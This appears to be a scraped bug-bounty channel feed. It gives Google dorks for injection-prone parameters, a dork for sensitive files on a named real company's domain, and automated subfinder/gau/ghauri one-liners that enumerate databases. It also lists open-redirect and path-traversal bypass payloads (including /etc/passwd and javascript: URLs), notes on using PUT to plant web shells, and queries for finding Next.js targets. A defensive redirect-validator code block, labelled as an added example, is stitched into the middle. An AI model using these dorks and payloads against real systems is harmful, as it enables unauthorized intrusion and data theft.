haxshadow
This channel is all about Bug hunting & Cybersec & Ethical Hacking related content.
Any query, msg me at @haxshadow_bot
YouTube: https://youtube.com/@haxshadow7
⚡️Google Dorks - Vulnerable Parameters ⚡️

⛔️XSS prone parameters:

inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example[.]com

⛔️Open Redirect prone parameters:

inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example[.]com

⛔️SQLi prone parameters:

inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example[.]com

⛔️SSRF prone parameters:

inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com

⛔️LFI prone parameters:

inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example[.]com

⛔️RCE prone parameters:

inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example[.]com

🔆 Credit: Mike Takashi
subfinder -d example.com -all -silent | gau --threads 50 | uro |
gf sqli >sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm

echo example.com | gau --threads 50 | uro |
gf sqli >sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm
subfinder -d vulnweb.com -all -silent | gau -t 50 | uro | gf sqli > sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm

echo "test.vulnweb.com" | gau -t 50 | uro | gf sqli > sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm
Hi... new video coming in....
Are you ready...
These writeups will help you; must read in your free time ❤️ [PortSwigger labs + Medium writeups + H1 reports] and you are good to go.. https://www.bugbountyhunting.com/
exploit.py
WordPress file upload vuln...
After recon, I found two bugs, so I will give a video on it, he said
🪲How I stay updated with CVEs?

curl https://cvedb[.]shodan[.]io/cves | jq | grep "cve_id"
Try this Google dork to find sensitive files on a website:

site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)
You can try this effective manual open redirect bypass:

1. Null-byte injection:
   - /google.com%00/
   - //google.com%00

2. Base64 encoding variations:
   - aHR0cDovL2dvb2dsZS5jb20=
   - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
   - //base64:d3d3Lmdvb2dsZS5jb20=/

3. Case-sensitive variations:
   - //GOOGLE.com/
   - //GoOgLe.com/

4. Overlong UTF-8 sequences:
   - %C0%AE%C0%AE%2F (overlong encoding for ../)
   - %C0%AF%C0%AF%2F%2Fgoogle.com

5. Mixed encoding schemes:
   - /%68%74%74%70://google.com
   - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
   - //base64:%2F%2Fgoogle.com/

6. Alternative domain notations:
   - //[email protected]/
   - //127.0.0.1.xip.io/
   - //0x7F000001/ (hexadecimal IP)

7. Trailing special characters:
   - //google.com/#/
   - //google.com/;&/
   - //google.com/?id=123&//

8. Octal IP address format:
   - https://0177.0.0.1/
   - https://00177.0000.0000.0001/

9. IP address variants:
   - https://3232235777 (decimal notation of an IP)
   - https://0xC0A80001 (hex notation of IP)
   - https://192.168.1.1/

10. Path traversal with encoding:
    - /..%252f..%252f..%252fetc/passwd
    - /%252e%252e/%252e%252e/%252e%252e/etc/passwd
    - /..%5c..%5c..%5cwindows/system32/cmd.exe

11. Alternate protocol inclusion:
    - ftp://google.com/
    - javascript:alert(1)//google.com

12. Protocol-relative URLs:
    - :////google.com/
    - :///google.com/

13. Redirection edge cases:
    - //google.com/?q=//bing.com/
    - //google.com?q=https://another-site.com/

14. IPv6 notation:
    - https://[::1]/
    - https://[::ffff:192.168.1.1]/

15. Double URL encoding:
    - %252f%252fgoogle.com (encoded twice)
    - %255cgoogle.com

16. Combined traversal & encoding:
    - /%2E%2E/%2E%2E/etc/passwd
    - /%2e%2e%5c%2e%2e/etc/passwd

17. Reverse DNS-based:
    - https://google.com.reverselookup.com
    - //lookup-reversed.google.com/

18. Non-standard ports:
    - https://google.com:81/
    - https://google.com:444/

19. Unicode obfuscation in paths:
    - /%E2%80%8Egoogle.com/
    - /%C2%A0google.com/

20. Query parameters obfuscation:
    - //google.com/?q=https://another-site.com/
    - //google.com/?redirect=https://google.com/

21. Using @ symbol for userinfo:
    - https://admin:[email protected]/
    - https://@google.com

22. Combination of userinfo and traversal:
    - https://admin:[email protected]/../../etc/passwd
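A defender's counterpart to the list above, added here as an example and not code from the post: a strict redirect-target validator in Python that rejects every bypass family shown (null byte, double and overlong encoding, backslash, scheme-relative, userinfo "@", IP-literal and IPv6 hosts, non-standard ports, traversal) by accepting only a plain relative path or an http(s) URL whose host is on an allowlist. The allowlist host app.example.com, evil.example and the sample targets are constructed for this example.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"app.example.com"}  # constructed allowlist for this example

def _fully_decode(s: str, rounds: int = 5) -> str:
    """Undo repeated percent-encoding (%252f -> %2f -> /) so nothing hides behind it."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Accept a plain relative path or an http(s) URL whose host is allowlisted."""
    decoded = _fully_decode(target)
    # Controls, NUL, whitespace, DEL, backslash or non-ASCII in either the raw or
    # the decoded form: browsers normalise these in ways naive parsers do not.
    for form in (target, decoded):
        if not form.isascii() or any(ord(c) < 0x21 or c in "\\\x7f" for c in form):
            return False
    if target.startswith("/"):
        # Relative path: no authority ('//'), no scheme (':'), no traversal ('..').
        # Stricter than the URL grammar requires, which is the point of an allowlist.
        return not (decoded.startswith("//") or ":" in decoded or ".." in decoded)
    try:
        parts = urlsplit(target)  # parse the RAW form; the decoded one can differ
        port = parts.port         # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    # Userinfo ('@') or percent-encoding inside the authority lets a browser choose
    # a different host than a parser sees; non-default ports are not allowlisted.
    if "@" in parts.netloc or "%" in parts.netloc or port is not None:
        return False
    return (parts.hostname or "").lower() in allowed_hosts

# Constructed samples shaped like the bypass variants in the post above.
BYPASS_SAMPLES = [
    "/google.com%00/", "//GoOgLe.com/", "%252f%252fgoogle.com", "%255cgoogle.com",
    "/%68%74%74%70://google.com", "%C0%AE%C0%AE%2F", ":////google.com/",
    "javascript:alert(1)//google.com", "https://3232235777", "https://[::1]/",
    "https://google.com:81/", "https://app.example.com@evil.example/",
    "https://app.example.com%2F@evil.example/", "/..%252f..%252fetc/passwd",
]
SAFE_SAMPLES = ["/dashboard", "/settings?tab=security", "HTTPS://APP.EXAMPLE.COM/logout"]

def verdicts(targets):
    return {t: is_safe_redirect(t) for t in targets}  # target -> accepted?
```

Every entry in BYPASS_SAMPLES is refused and every entry in SAFE_SAMPLES is accepted; the raw string is parsed (never the decoded one) so that an encoded "@" in the authority cannot move the host.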
Always check endpoints.
Triaged P1 and huge impact

#bugbountytip
Always check the allowed HTTP methods
====>

Using HTTP method PUT
==>
Attacker can create or modify files in this directory without providing any type of authentication.
==>
Attacker may be able to create a web shell in this directory, open a backdoor and run RCE

Using HTTP method DELETE
==>
Attacker can delete any file in that directory, which
sometimes leads to taking down the host
Nest.js with SSRF... coming soon
How to Find SSRF Vulnerabilities in Next.js | Bug Bounty Hunting POC
https://youtu.be/80MF5blHO6w?si=21o4mwRlSjt5pMxg
NextJS-Vulnerability.yaml
// Query //
en.fofa.info : body="/_next/static" && title="Next.js"
publicwww : body="/_next/static" title="Next.js"
shodan : body:"/_next/static" title:"Next.js"